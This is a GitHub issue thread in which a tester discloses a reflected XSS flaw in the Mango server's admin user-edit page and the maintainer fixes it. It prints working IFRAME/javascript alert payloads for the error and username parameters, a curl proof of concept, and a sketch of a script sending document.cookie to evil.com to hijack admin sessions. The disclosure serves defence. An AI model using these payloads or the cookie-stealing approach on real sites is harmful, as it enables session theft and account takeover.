Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Bug Report] Security issue XSS in error parameter #289

Closed
bararchy opened this issue Apr 3, 2022 · 7 comments · Fixed by #292 or #293
Closed

[Bug Report] Security issue XSS in error parameter #289

bararchy opened this issue Apr 3, 2022 · 7 comments · Fixed by #292 or #293
Labels
bug Something isn't working

Comments

@bararchy
Copy link

bararchy commented Apr 3, 2022

Describe the bug
In the Error entrypoint at /admin/user/edit?error=error message there is a lack of proper string sanitation allowing for an XSS (Cross Site Scripting) attack.

While working on testing the https://github.com/NeuraLegion/sec_tester shard by integration to multiple projects I've found that there was a High severity issue in that parameter.

To Reproduce
Steps to reproduce the behavior:

  1. Go to /admin/user/edit?error=error message
  2. Change the error message to %3CIFRAME+onMouseOver%3Dalert%28298311%29+src%3D%22javascript%3Aalert%28298311%29%3B%22%3E%3C%2FIFRAME%3E
  3. This will pop-up the alert message 298311
  4. Example Screen:
    image

Expected behavior
The alert shouldn't be raised and the user should either not be allowed to control the error message, or if this is needed then string sanitation to remove all non alphanumeric values should be added.

Docker (if you are running Mango in a Docker container)

  • The standard file using latest docker.

Additional context
There were other Low severity issues found and I haven't really covered much of the application with the tests, It might be worth to make a bigger scope check

@bararchy bararchy added the bug Something isn't working label Apr 3, 2022
@hkalexling
Copy link
Member

Oops that's bad! I will do a bug fix release soon. Thanks for catching this!

@bararchy
Copy link
Author

bararchy commented Apr 3, 2022

@hkalexling thanks for tackling that quickly! 🎉
I'm broadening the scope of my tests, do you want additional findings as new issues or as comments here?

I would also suggest for the sake of users to publish a security advisory :)
https://docs.github.com/en/code-security/repository-security-advisories/creating-a-repository-security-advisory

@hkalexling
Copy link
Member

Thanks! It would be great if you could update the issue for any additional XSS vulnerabilities and create new tickets for other security issues.

Oh, I didn't know it's a thing! I will look into it. By the way, I think the severity of this particular vulnerability is not high - the only way for it to work is for the attacker to craft the URL and trick the victim into opening it. Or maybe I am missing something?

@bararchy
Copy link
Author

bararchy commented Apr 3, 2022

The attack is a client side attack but is definitely on the high severity side.

Using simple check out the new hidden manga bundled with mango! Just go to: yourdomain/path/with/evil/script

And make the script call a remote attacker server with evil.com?url=document.location&cookie=document.cookies

Because the attack builds on yourdomain it's very trustworthy and users usually ignore the usual signs for phishing (it's my site, it's safe).

Meanwhile attacker gets admin access by using the session cookie.

So in large yes, it's client side, but it's easy to weaponize and has high impact.

I hope my explanation makes sense :)

@hkalexling
Copy link
Member

hkalexling commented Apr 3, 2022

Yeah I agree. I didn't think about the psychological aspect of that, and it makes total sense. Thanks for your time in checking and explaining this, really appreciate it!

@bararchy
Copy link
Author

bararchy commented Apr 3, 2022

@hkalexling Seems the username param is also vulnerable:

curl -i -H 'Referer:http://127.0.0.1:9000/admin/user' -H 'cookie:mango-sessid-9000=c7a43472238bd067d7aebe0cb405b4ce--fd270bcd2a710276437daad26aa97385e6a92eec' -H 'User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept-Encoding:identity' -H 'Content-Length:0' 'http://127.0.0.1:9000/admin/user/edit?username=--%3E%3CIFRAME+onMouseOver%3Dalert%28252919%29+src%3D%22javascript%3Aalert%28252919%29%3B%22%3E%3C%2FIFRAME%3E&admin=true'

url: http://127.0.0.1:9000/admin/user/edit?username=--%3E%3CIFRAME+onMouseOver%3Dalert%28252919%29+src%3D%22javascript%3Aalert%28252919%29%3B%22%3E%3C%2FIFRAME%3E&admin=true

POC:
image

@hkalexling hkalexling linked a pull request Apr 4, 2022 that will close this issue
hkalexling added a commit that referenced this issue Apr 4, 2022
Sanitize parameters on user edit page (fixes #289)
@hkalexling hkalexling mentioned this issue Apr 4, 2022
@mango-assistant
Copy link

Hi there! The issue has been fixed in v0.26.1. Thanks for the bug report!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants